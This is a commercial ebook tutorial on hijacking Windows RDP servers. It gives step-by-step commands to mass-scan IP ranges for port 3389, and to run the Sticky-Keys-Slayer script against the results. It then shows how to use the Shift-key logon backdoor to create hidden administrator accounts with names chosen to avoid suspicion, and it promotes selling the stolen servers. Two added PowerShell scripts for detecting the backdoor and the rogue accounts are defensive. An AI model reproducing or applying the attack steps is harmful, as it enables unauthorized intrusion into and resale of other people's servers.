RDP King [PDF]


DISCORD SUPPORT ➤ PunchMan#1250

INTRODUCTION

Hello and thank you for your purchase!

Welcome to RDP KING.

By doing this tutorial step by step you will learn:
➜ How to find potentially vulnerable RDPs using a powerful script.
➜ How to make yourself the owner of those RDPs.
➜ How the script works.
➜ How you can use the servers you will crack.

Before we start I want to make sure that you know some server-related words:
➜ VPS: Virtual Private Server. It is basically a private server that runs inside a “dedicated” (normal) server; a virtual environment, like a Virtual Machine.
➜ RDP: Remote Desktop Protocol. It is the protocol we use to connect to Windows VPSs; we also call a Windows VPS itself an “RDP”.

Now, let’s talk about the OS and software we are going to use. I recommend using both a Windows and a Linux environment (like Kali Linux). If you are using Windows, as many users do, you can easily install a Kali Linux Virtual Machine on your Windows PC (although a standalone Windows OS is recommended instead). You can quickly create a Virtual Machine with the help of Google or by following guides on YouTube. Example: https://www.youtube.com/watch?v=SVyWeQTtHu8

HOW DOES THE SCRIPT WORK?

The script we are going to use is entirely based on a kind of bug/exploit: some servers make the cmd pop up when we press the Shift key 5 times at the logon screen, without the need of logging in. (On such servers the Sticky Keys accessibility binary, sethc.exe, has been replaced by or redirected to cmd.exe, so this is a backdoor already present on the host rather than a flaw in RDP itself.) This lets us become the administrator of the machine, so that we can create a new user and give it full admin permissions. This also means that the real owner of the RDP cannot see what we are running on the machine.
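As an added example (not part of this guide or of the Sticky-Keys-Slayer project), here is a PowerShell audit a server owner can run locally to check for the conditions the script above looks for: an IFEO Debugger redirection or a swapped binary for sethc.exe and the other accessibility executables, plus whether RDP Network Level Authentication is enforced, which stops an unauthenticated client from ever reaching the logon screen. It assumes PowerShell 5 or later run from an elevated prompt; the registry paths and cmdlets are standard Windows ones.

```powershell
# Added example (not from the RDP King guide): audit one Windows host for the
# Sticky Keys backdoor conditions. Run from an elevated PowerShell 5+ prompt.
$findings = @()
$sys32    = "$env:SystemRoot\System32"
$accessibilityBins = 'sethc.exe','utilman.exe','osk.exe','narrator.exe',
                     'magnify.exe','displayswitch.exe','atbroker.exe'
$ifeo    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$cmdHash = (Get-FileHash "$sys32\cmd.exe" -Algorithm SHA256).Hash

foreach ($bin in $accessibilityBins) {
    $path = Join-Path $sys32 $bin
    if (-not (Test-Path $path)) { continue }

    # 1. IFEO "Debugger" redirection: launching $bin starts the debugger value instead.
    $dbg = Get-ItemProperty -Path (Join-Path $ifeo $bin) -Name Debugger -ErrorAction SilentlyContinue
    if ($dbg) { $findings += "IFEO Debugger set for ${bin}: $($dbg.Debugger)" }

    # 2. Swapped binary: same bytes as cmd.exe, or PE metadata that names another file.
    $hash = (Get-FileHash $path -Algorithm SHA256).Hash
    $orig = (Get-Item $path).VersionInfo.OriginalFilename
    if ($hash -eq $cmdHash) { $findings += "$bin is byte-identical to cmd.exe" }
    elseif ($orig -and $orig -ne $bin) { $findings += "$bin has OriginalFilename '$orig'" }

    # 3. Signature check (genuine system files are catalog-signed and report Valid).
    $sig = Get-AuthenticodeSignature $path
    if ($sig.Status -ne 'Valid') { $findings += "$bin signature status: $($sig.Status)" }
}

# 4. NLA: with UserAuthentication=1 an unauthenticated RDP client never reaches the
#    logon screen, so the Shift-x5 trick cannot be triggered over RDP at all.
$rdpTcp = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
$nla = (Get-ItemProperty -Path $rdpTcp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
if ($nla -ne 1) { $findings += 'RDP Network Level Authentication is not enforced (UserAuthentication != 1)' }

if ($findings.Count -eq 0) { 'No Sticky Keys backdoor indicators found' } else { $findings }
```

A hit on checks 1 to 3 means the host is already backdoored and should be treated as compromised, not merely reconfigured; check 4 is the setting that makes the whole scan described on this page fail against the host.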

COLLECTING THE IP ADDRESSES: MASSCAN

The first step in cracking RDPs consists of finding IP addresses with port 3389 OPEN. The fastest way to do that is to collect IP ranges and then find which addresses in them have port 3389 open. In this guide we are going to use masscan, but you can use another program; masscan is just the tool I always use and I think it is the fastest port scanner. If you are going to run masscan on an RDP, be aware that some companies do not allow such a program to be run on their servers and this might result in a ban.

1) Download and install on Windows the latest version of WinPcap (https://www.winpcap.org/).

2) Download Masscan GUI: https://mega.nz/#!JEU2nS6K!28_fQv9LVfcEzXCyhohft-xOsE4JUutPV9W7QtSe5Y (95% it is not infected but just a false positive; you can run it sandboxed to be 100% safe).

3) Go to http://services.ce3c.be/ciprg/, enter the desired country and click « Generate » (see picture below).

4) Copy a bunch of lines that the website has generated (see picture below)

5) Open masscan and make it look like this, with the lines in the black box (format example: 2.0.0.0-255.240.0.0).

6) Change the target port to 3389 and, if you have a good connection, you can set a greater number of threads.

7) Wait until masscan ends or until you have collected some thousands of IPs (10000+ recommended).

8) After gathering the needed IPs you can stop masscan (Ctrl+C stops the running scan).

9) Now you can click the “open results” button and enjoy your txt file with all the IPs! Otherwise you can also open the txt file from the masscan directory.

MOVING THE IPs TO KALI LINUX

Once you have your txt file ready with the IPs, we need to move the file from Windows to the Linux environment. The file must contain one IP per line; if your file does not, you can easily extract the IPs using this site: http://www.toolsvoid.com/extract-ip-addresses

The easiest way to move the file is to upload it to https://anonfile.com/ and then download it in the Linux environment (using the download link that anonfile gives you).

Keep in mind the location of the txt file containing the IPs.

SETTING UP THE SCRIPT

Before running the cracking script you will need to download and install some applications and modules, to make sure that everything will work without error messages. Open the Kali Linux terminal and run these commands; sometimes you need to enter “y” to continue (root permissions needed):

apt-get update
apt-get -y install imagemagick xdotool parallel bc
apt-get install rdesktop git

DOWNLOADING AND RUNNING THE SCRIPT

To clone (clone = download) the script, run the following command. It is recommended to clone the script in the root directory (= main directory):

git clone https://github.com/linuz/Sticky-Keys-Slayer.git

Now a directory called “Sticky-Keys-Slayer” has been created. To enter that directory we use the command:

cd Sticky-Keys-Slayer

Before starting the script you will need to put the txt file containing the IPs we found using masscan in that directory. An easy way to do that is to open the file explorer, copy the txt file and paste it into the Sticky-Keys-Slayer directory. Let’s suppose that you called the IPs file IPs.txt. Run this command in the terminal:

./stickyKeysSlayer.sh -v -j8 -t 10 IPs.txt

where IPs.txt is the name of the file containing the IPs. Here is a sample picture:

The script will now be running and you will see some rdesktop tabs popping up. Note that you should not use the PC while the script is running, but if you set everything up in a Virtual Machine you can still use the PC like before.

FINDING OUT VULNERABLE RDPs

When the script ends, or when it gets aborted, it’s time to find out which RDPs are vulnerable. Here is how to do it. In the Sticky-Keys-Slayer directory you will find a folder called “screenshots”; it contains a screenshot for every RDP you have scanned. Inside the screenshots folder there is another folder called “discovered”, which contains the screenshots of the vulnerable RDPs.

Some of them are false positives, but if the screenshot shows the CMD it’s probably a good result. Here is an example:

CREATING A NEW USER

Before creating new users with admin permissions on vulnerable servers, I have to warn you that if the following commands do not work on a server you are trying to crack, it is likely that the server is not exploitable and there is nothing you can do.

As mentioned before, the “discovered” folder contains all the servers that showed a cmd; open that folder to find the IP addresses of those servers. The IP address is written in the file name of the screenshot and at the top of the screenshot itself.

Now, open the terminal and execute this command to try to connect to a “discovered” RDP.

rdesktop [ip address of vulnerable server]

You will see an rdesktop tab opening. In that rdesktop tab press the SHIFT key 5 times; you will probably see the cmd appearing, however in some cases you need to press Shift 6+ times.

If you pressed Shift and nothing happens, the server you are trying to crack is probably not exploitable; it’s just a false positive.

If the cmd opens up correctly run this command to create a new user:

net user /add [username] [password]

where [username] is the username you choose. I strongly recommend using a name like “System”, “Windows” or “Other User” to avoid looking suspicious. You can choose whatever you want as the password, just make sure not to forget it! Write it down somewhere; an easy way to identify cracked servers is [username]@[IP];[password], like [email protected];U4G8

Now to give your account full administrator functions run this command:

net localgroup Administrators [username] /add

You have now successfully created a new admin user, so you have finally cracked the server. To log in, use the [IP] and the [username] and [password] you just chose.

Obviously you will now have to repeat these steps for every server you find in the “discovered” folder.
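As an added defensive example (not from this guide), the following PowerShell script reads the Windows Security log for the traces the two commands above leave on the server: event 4720 (a user account was created) and event 4732 (a member was added to a security-enabled local group), correlating them so that a brand-new account added to Administrators stands out. It assumes PowerShell 5 or later, an elevated prompt, and that the “User Account Management” and “Security Group Management” audit subcategories are enabled; the $Hours parameter is my own.

```powershell
# Added example (not from the guide): find local account creations (4720) and
# additions to the local Administrators group (4732) in the Security log.
# Requires audit of "User Account Management" and "Security Group Management".
param([int]$Hours = 24)   # lookback window; assumed parameter, not from the guide

$since  = (Get-Date).AddHours(-$Hours)
$filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

$created = @{}   # SID -> account name, filled from 4720 events
$alerts  = @()
foreach ($e in ($events | Sort-Object TimeCreated)) {
    # Pull the EventData fields (TargetUserName, SubjectUserName, MemberSid, ...) out of the XML.
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    if ($e.Id -eq 4720) {
        # A cmd opened at the logon screen runs as SYSTEM, so the creator then shows up
        # as the computer account (HOSTNAME$) rather than a human administrator.
        $created[$d.TargetSid] = $d.TargetUserName
        $alerts += "$($e.TimeCreated) account '$($d.TargetUserName)' created by $($d.SubjectUserName)"
    }
    elseif ($e.Id -eq 4732 -and $d.TargetUserName -eq 'Administrators') {
        # MemberSid is the SID of the account added; correlate it with a recent 4720.
        $isNew = $created.ContainsKey($d.MemberSid)
        $name  = if ($isNew) { $created[$d.MemberSid] } else { $d.MemberSid }
        $tag   = if ($isNew) { 'NEW ACCOUNT' } else { 'existing account' }
        $alerts += "$($e.TimeCreated) $tag '$name' added to local Administrators by $($d.SubjectUserName)"
    }
}

if ($alerts.Count -eq 0) { "No account creations or Administrators changes in the last $Hours hours" }
else { $alerts }
```

The innocuous-looking names the guide recommends (“System”, “Windows”, “Other User”) are exactly what this correlation surfaces, because the name does not matter: a 4720 followed by a 4732 into Administrators, with the computer account as subject, is the signal.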

CONCLUSIONS

I have taught you this advanced and private method to crack RDPs. If you have any questions I will do my best to help you; add me on Discord: PunchMan#1250

With this advanced script you can crack about 3-15 servers every day just by running it overnight.

You can do almost everything on the cracked servers, but if you use a lot of system resources it’s possible that your server will be banned.

The hardware specs of the servers you crack are kind of random; there is no way to predict how good or bad the server you are going to crack will be. The Windows version is random too: you will usually find Windows 2003, XP, 2008, 7 or 2012.

A great way to make money with these servers is selling them. I made a decent amount of money selling servers, but of course you need to restock your shop regularly and this takes time. Cracked servers are often good for cracking, too. Here is some proof from my Selly.gg:

I really hope this book has helped you, good cracking! THIS EBOOK IS ONLY SOLD BY WHITEDEV AT : https://shoppy.gg/@WhiteDEV